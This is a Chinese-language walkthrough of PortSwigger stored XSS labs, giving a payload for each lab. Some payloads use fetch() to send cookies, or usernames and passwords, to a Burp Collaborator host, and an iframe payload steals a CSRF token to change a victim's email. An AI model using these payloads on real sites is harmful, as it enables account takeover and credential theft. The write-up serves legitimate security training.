stored_xss
-
stored_xss
- Stored XSS into HTML context with nothing encoded
- Stored XSS into anchor href attribute with double quotes HTML-encoded
- Stored DOM XSS
- Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped
- Exploiting cross-site scripting to steal cookies
- Exploiting cross-site scripting to capture passwords
- Exploiting XSS to perform CSRF
Stored XSS into HTML context with nothing encoded
-
题目要求
提交评论,调用
alert
函数 -
解题过程
直接祖传payload就行
Stored XSS into anchor href
attribute with double quotes HTML-encoded
-
题目描述
评论功能点有存储型xss
要求当author name被点击的时候调用
alert
函数 -
解题过程
<p> <img src="/resources/images/avatarDefault.svg" class="avatar"> <a id="author" href="https://test.test">name</a> | 24 May 2020 </p>
随便输个链接测试一下,发现输入的
website
被直接嵌入到了href
里构造payload:
javascript:alert()
Stored DOM XSS
-
题目描述
评论功能点有存储型dom-xss,调用
alert
函数即可 -
解题过程
关键代码
function escapeHTML(html) { return html.replace(‘<‘, ‘<‘).replace(‘>‘, ‘>‘); } let newInnerHtml = firstPElement.innerHTML + escapeHTML(comment.author)
注意这里的
escapeHTML
函数的定义,使用了replace
函数,js的replace
函数有个特性,只会替换最开始出现的一个字符,所以构造payload:
<><img src=x onerror=alert()>
Stored XSS into onclick
event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped
-
题目描述
评论功能点有存储型xss
要求当author name被点击的时候调用
alert
函数 -
解题过程
这是上上道题的升级版,
<>
和"
会被HTML编码,‘
和\
会被addslash关键代码
<a id="author" href="https://aaaaa\‘"`\\" onclick="var tracker={track(){}};tracker.track(‘https://aaaaa\‘"`\\‘);">asd</a>
可以看到website直接被嵌入到了
href
和onclick
,因为后端检测了url格式,所以href
无法进行xss看
onclick
,考虑如何闭合引号,注意到这里是html+js环境,所以可以使用HTML实体编码
/unicode编码
,但是\
会被addslash,所以只能用HTML实体编码
构造payload:
http://xss'-alert()-'
这里涉及到一个js的知识点,
eval(‘xss‘-alert()
会弹窗,即js语境中,字符串与语句进行运算,会执行语句
Exploiting cross-site scripting to steal cookies
-
题目描述
博客评论点有存储型xss
要求盗取
cookie
并模拟被盗者身份 -
解题步骤
这道题要用到
Burp Collaborator
,这是一个burp
自带的测试工具,贴一篇介绍简单来说就是一个用来接收并返回数据的接口,类似于自己搭的vps接收cookie
构造payload:
<script> fetch(‘https://xxxxxx.burpcollaborator.net‘,{ method:‘post‘, body:document.cookie }); </script>
放到评论区,然后在
Burp Collaborator Client
poll一下拿到cookie,再替换掉自己的cookie就可以
Exploiting cross-site scripting to capture passwords
-
题目描述
在博客评论点有存储型xss
要求盗取
username
和password
并登录 -
解题过程
这道题参考了官方的solution,没有过盗取
username
和password
的思路<input name=username id=username> <input type=password name=password onchange="if(this.value.length)fetch(‘https://4glwxnk77bznm13y44j75a137udl1a.burpcollaborator.net‘,{ method:‘POST‘, mode: ‘no-cors‘, body:username.value+‘:‘+this.value });">
payload利用了
username
和password
接口,在用户访问页面时自动填写,这里有点脑洞题的感觉,因为这里的赋值是需要后台进行渲染,或者通过get传值的。但payload思路可以借鉴
Exploiting XSS to perform CSRF
-
题目描述
在评论点有存储型xss
要求修改查看评论的用户的邮件地址
-
解题过程
先登录给的账号,修改email,用burp看下数据包
关键部分
POST /email/change-email HTTP/1.1 Host: accf1faa1fa54c128098504e00910043.web-security-academy.net Connection: close Content-Length: 58 Origin: https://accf1faa1fa54c128098504e00910043.web-security-academy.net Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: session=hVm5TBng8eVK17OV1ulcF6IP5xbwzcu4 email=aaaa%40bbb.ccc&csrf=aIMl9DOIMdHZQ4qsl05r4dERRyrRzFm6
这里需要一个csrf token,所以要用到iframe
构造payload:(可行)
<iframe src=‘https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email‘ name=‘xxx‘ onload=" var csrf = window.frames[‘xxx‘].document.getElementsByName(‘csrf‘)[0].value; fetch(‘https://accf1faa1fa54c128098504e00910043.web-security-academy.net/email/change-email‘,{ method:‘post‘, body:‘email=aaa@bbb.ccc&csrf=‘+csrf });"> </iframe>